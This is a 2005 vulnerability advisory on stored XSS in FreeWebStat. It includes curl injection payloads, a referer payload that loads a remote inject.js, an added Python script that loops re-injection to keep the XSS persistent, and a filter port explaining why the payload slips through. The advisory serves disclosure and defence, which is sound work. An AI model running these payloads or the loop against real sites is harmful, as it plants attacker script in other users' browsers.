
Free Web Stat Multiple XSS Vulnerabilities

November 25, 2005 at 2:15 am - Filed under Hacks, Language EN - 1095 words, reading time ~3 minutes

FreeWebStat 1.0 rev37 (the latest version at the time of writing) is vulnerable to multiple XSS. The impact is somewhat bigger than for a plain reflected XSS, since the data is stored in a flat file and the result of a single query persists for some time on the backend. A well-timed loop of requests makes the XSS effectively permanent.

This can be used to inject arbitrary JS code into the page and keep it there pseudo-permanently, so other users execute the JS without needing any special URL.

FreeWebStat Multiple XSS Vulnerabilities

 Name              Multiple XSS Vulnerabilities in FreeWebStat
 Systems Affected  FreeWebStat (verified on 1.0 rev37)
 Severity          Medium Risk
 Vendor            www.freewebstat.com
 Advisory          http://www_ush_it/2005/11/25/free-web-stat/
 Author            Francesco "aScii" Ongaro (ascii at katamail . com)
 Date              20051125 

I. BACKGROUND

FreeWebStat is a PHP stats program, more information is
available at the vendor site.

II. DESCRIPTION

FreeWebStat 1.0 rev37 (the latest version at the time of writing)
is vulnerable to multiple XSS. The impact is somewhat bigger than
for a plain reflected XSS, since the data is stored to a file and
the result of a single query persists for some time on the
backend. A well-timed loop of requests makes the XSS permanent.

We issued an advisory for another application by the same
author, "Php Web Statistik Multiple Vulnerabilities", and the
author replied that a "new version with all fixed bugs can be
found under www.freewebstat.com". We downloaded that version
and found the same type of vulnerabilities.

The old advisory:
http://www_ush_it/2005/11/19/php-web-statistik/

III. ANALYSIS

These vulnerabilities can be exploited with a plain GET request.

1) logdb.html XSS

logdb.html is vulnerable to JS injection using anti-escape
methods (e.g. single quotes are stripped, but there are plenty
of working workarounds for this, such as payloads that need no
quotes at all).

1.1) Curl the pixel.php

curl "http://local.asciistation.zapto.org/fws/pixel.php\
?domain=<script>alert(1)</script>\
&site=<script>alert(2)</script>\
&jsref=<script>alert(3)</script>\
&jsres=<script>alert(4)</script>\
&jscolor=<script>alert(5)</script>" \
  -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))" \
  -e "http://www_ush_it"

$site, $jsref, $jsres and $jscolor are vulnerable ($domain is
not: alert(1) never fires).

Supplying a URL in $jsref yields a full link in the output (if
the logdb.html page has any PageRank, some of it can be drained).

1.2) Call stats.php

This will generate the new logdb.html file.

1.3) Visit logdb.html

You will see some alerts. : )

The order with the example query is 2 3 2 3 4 5.
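
The three steps above, automated into the "well-timed loop" the description talks about. This is an added example in Python, not code from the advisory or from FreeWebStat; it assumes the install layout used in the curl lines of this section (pixel.php, stats.php and logdb.html under one base URL), and BASE_URL, REFERER, MARKER, ROUNDS and PERIOD_S are placeholders to adjust for the copy being tested.

```python
# Added example (not from the advisory): drive steps 1.1 -> 1.2 -> 1.3 in a
# loop so the injected entry is always among the recent ones the backend
# keeps. Assumed layout: pixel.php, stats.php and logdb.html under BASE_URL.
import time
import urllib.request
from urllib.parse import urlencode

# User-Agent string taken from the advisory's curl commands.
UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"
BASE_URL = "http://local.asciistation.zapto.org/fws"  # host from the advisory; placeholder
REFERER = "http://www.example.org/"                    # placeholder Referer
MARKER = 1337       # a bare number: the payload must not need quotes
ROUNDS = 20         # how many re-injections to send
PERIOD_S = 30.0     # seconds between them; keep it below the backend's retention


def payload(marker: int) -> str:
    """The stored script. Section 1 notes that single quotes are stripped,
    so the marker is numeric and the payload contains no quotes at all."""
    return f"<script>alert({marker})</script>"


def pixel_url(base: str, marker: int) -> str:
    """Step 1.1: one pixel.php hit with the payload in every field the
    advisory found vulnerable (site, jsref, jsres, jscolor)."""
    p = payload(marker)
    params = {"domain": "ush.it", "site": p, "jsref": p, "jsres": p, "jscolor": p}
    return f"{base}/pixel.php?{urlencode(params)}"


def fetch(url: str) -> str:
    req = urllib.request.Request(url, headers={"User-Agent": UA, "Referer": REFERER})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("iso-8859-1", errors="replace")


def payload_present(page: str, marker: int) -> bool:
    """Step 1.3 check: did the payload survive into the regenerated page?"""
    return payload(marker) in page


def reinject(base: str, marker: int, rounds: int, period_s: float) -> int:
    """Repeat 1.1 -> 1.2 -> 1.3; returns how many rounds found the payload
    in logdb.html after regeneration."""
    hits = 0
    for i in range(rounds):
        fetch(pixel_url(base, marker))                 # 1.1 log the poisoned hit
        fetch(f"{base}/stats.php")                     # 1.2 regenerate logdb.html
        if payload_present(fetch(f"{base}/logdb.html"), marker):  # 1.3 verify
            hits += 1
        if i + 1 < rounds:
            time.sleep(period_s)
    return hits


if __name__ == "__main__":
    print(f"{reinject(BASE_URL, MARKER, ROUNDS, PERIOD_S)}/{ROUNDS} rounds persisted")
```

Point BASE_URL at a copy you are allowed to test. The period is what matters: it has to be shorter than the time a single entry survives on the backend, because that overlap is what turns a reflected hit into a stored one.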

1.4) Some test curls

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=ush.it&site=<script>alert(123)&jsref=1024x768&jsres=1337&jscolor=red" \
  -e "http://www.google.it/search?q=lello+splendor++&hl=it&lr=&start=10&sa=N" \
  -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=1337&jscolor=red" \
  -e "http://www.google.it/search?q=lello+splendor++&hl=it&lr=&start=10&sa=N" \
  -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=1337&jscolor=red" \
  -e "http://www.suma.it/" \
  -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=<script>alert(1)</script>&site=<script>alert(2)&jsref=</script><script>alert(3)</script>&jsres=<script>alert(4)</script>&jscolor=<script>alert(5)</script>" \
  -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))" \
  -e "http://www_ush_it"

2) stat.php search key XSS

2.1) Detecting the search key XSS

- if ( !in_array ( $logfile_entries [ 2 ] , $ip_archive ) )
+ if (TRUE)

# save the referer except the own domain name.
if the browser value is empty, do not save
+ echo "DEBUG<h1>".$logfile_entries [ 7 ]."</h1>";
if ( ( strpos ( $logfile_entries [ 7 ] , $exception_domain )
=== FALSE ) && ( trim ( $logfile_entries [ 7 ] ) != "" ) )
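
Review bot: the `+ echo "DEBUG<h1>".$logfile_entries [ 7 ]."</h1>";` line writes the referer into the page unencoded, and `+ if (TRUE)` switches off the per-IP duplicate check, so this debug patch is itself a stored XSS sink plus a dedup bypass; fine as local instrumentation for the test below, but it must not reach a deployed copy, and if the echo is kept the value should go through htmlspecialchars().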

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=ush.it&site=aa&jsref=sukasuka&jsres=1337&jscolor=red"

This will display as many "DEBUG sukasuka" lines under the header
and above the "summary" as there are new queries.

# save the referer except the own domain name.
if the browser value is empty, do not save
if ( ( strpos ( $logfile_entries [ 7 ] , $exception_domain )
=== FALSE ) && ( trim ( $logfile_entries [ 7 ] ) != "" ) )

$logfile_entries[7] is the $jsref variable.

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?site=&jsres=&jscolor=&jsref=ssss&domain="

search words    ( 1 )  lello splendor  100 %  1
search engines  ( 1 )  Google          100 %  1
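
The search-key path end to end, as an added example in Python (not code from the advisory or from FreeWebStat): a raw extractor for the q= parameter of a Google Referer, a line-by-line port of the four filter lines quoted from stat.php in section 2.2 below, the payload from that section, and the same keyword-table cell rendered with and without HTML encoding. Two assumptions, not statements from the advisory: that stat.php reads q= without URL-decoding it (the advisory only shows that www.google.it/search?q=... ends up in the keyword table), and that PHP's magic_quotes_gpc, commonly on in 2005 installs, is what turns each double quote into \" before the first filter line deletes it. The second is included because it explains why the payload is written with `-src= "..."`: it yields a working tag whether the quotes survive or not.

```python
# Added example (not from the advisory): port of stat.php's search-term
# filter and the payload from section 2.2, with the vulnerable and the
# hardened rendering of the keyword-table cell side by side.
import html
import re

# Payload from section 2.2. The '-' before src= is the only "space" inside
# the tag; the filter below turns it into a real one.
PAYLOAD = ('ppoopp<script language="javascript"-src= '
           '"http://local.asciistation.zapto.org/fws/inject.js"></script>')
REFERER = "http://www.google.it/search?q=" + PAYLOAD + "&hl=it"
# Constructed ordinary referer, matching the "lello splendor" row in 2.1.
BENIGN_REFERER = "http://www.google.it/search?q=lello+splendor++&hl=it&lr=&start=10&sa=N"


def raw_search_terms(referer: str) -> str:
    """Return the q= value of a Google search URL without URL-decoding it.
    Assumption: stat.php reads the parameter this way."""
    query = referer.split("?", 1)[1] if "?" in referer else ""
    for pair in query.split("&"):
        if pair.startswith("q="):
            return pair[2:]
    return ""


def fws_term_filter(terms: str) -> str:
    """Port of the four lines quoted from stat.php in section 2.2."""
    terms = terms.replace('\\"', "")   # str_replace('\"', "", $terms)   delete \"
    terms = terms.lower()              # strtolower($terms)
    terms = terms.replace("+", " ")    # str_replace("+", " ", $terms)
    terms = terms.replace("-", " ")    # str_replace("-", " ", $terms)
    return terms


def magic_quotes(s: str) -> str:
    """Assumption: with PHP magic_quotes_gpc on, every double quote in
    request data reaches the filter as backslash-quote, which the first
    filter line then deletes outright."""
    return s.replace('"', '\\"')


def vulnerable_row(terms: str) -> str:
    """Keyword-table cell as the vulnerable page effectively emits it:
    filtered, but not HTML-encoded."""
    return f"<td>{fws_term_filter(terms)}</td>"


def hardened_row(terms: str) -> str:
    """Same cell with output encoding (htmlspecialchars with ENT_QUOTES in
    PHP), which is the fix; the filter above is not a security control."""
    return f"<td>{html.escape(fws_term_filter(terms), quote=True)}</td>"


# Loosely mimics a browser: a <script> tag whose src= value may be quoted
# or bare, with optional whitespace after '='.
SCRIPT_SRC = re.compile(r'<script\b[^>]*\bsrc=\s*"?([^"\s>]+)"?', re.I)


def loaded_script(cell: str):
    """URL a browser would fetch from the cell, or None if no tag survives."""
    m = SCRIPT_SRC.search(cell)
    return m.group(1) if m else None


if __name__ == "__main__":
    terms = raw_search_terms(REFERER)
    for label, t in (("raw", terms), ("magic_quotes", magic_quotes(terms))):
        print(label, vulnerable_row(t), "->", loaded_script(vulnerable_row(t)))
    print("hardened ->", loaded_script(hardened_row(terms)))
```

With the quotes intact the filter produces `language="javascript" src= "http://.../inject.js"`; with them escaped and deleted it produces `language=javascript src= http://.../inject.js`, an unquoted attribute value that browsers accept just the same. Neither lowercasing nor the `+`/`-` replacement changes that, which is why the workaround has to be encoding at output time rather than more of this kind of filtering.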

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?site=&jsres=&jscolor=&jsref=http://www.google.it/search?q=lello+splendor++&hl=it"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?site=&jsres=&jscolor=&jsref=http://www.google.it/search?q=<script>alert(123456789)</script>++&hl=it"

Now the injection is executed in two points, the referer table and
the keyword table.

2.2) Exploiting the search key XSS

stat.php gives us some tricks, and we are evil. The string will be
lowercased and any + or - char will become a (real, not a %20) space.

$terms = str_replace( '\"', "", $terms ); # delete \"
$terms = strtolower( $terms ); # string to lower
$terms = str_replace( "+" , " ", $terms ); # replace + with space
$terms = str_replace( "-" , " ", $terms ); # replace - with space

ascii> curl 'http://local.asciistation.zapto.org/fws/pixel.php?site=&jsres=&jscolor=&jsref=http://www.google.it/search?q=ppoopp<script language="javascript"-src= "http://local.asciistation.zapto.org/fws/inject.js"></script>&hl=it'

IV. DETECTION

FreeWebStat 1.0 rev37 is vulnerable. Older versions not verified.

V. WORKAROUND

Input validation will fix the vulnerability. Since the referer and
the search terms legitimately contain arbitrary text, the values
also need HTML encoding (htmlspecialchars) when written into the
generated pages.

VI. VENDOR RESPONSE

Vendor will fix and release a new version.

VII. CVE INFORMATION

No CVE at this time.

VIII. DISCLOSURE TIMELINE

20051125 Bug discovered
20051125 Developer notification
20051125 Advisory released
20051128 Vendor response

IX. CREDIT

ascii is credited with the discovery of this vulnerability.

X. LEGAL NOTICES

Copyright (c) 2005 Francesco "aScii" Ongaro

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without my express
written consent. If you wish to reprint the whole or any part of
this alert in any other medium other than electronically, please
email me for permission.

Disclaimer: The information in the advisory is believed to be
accurate at the time of publishing based on currently available
information.
Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.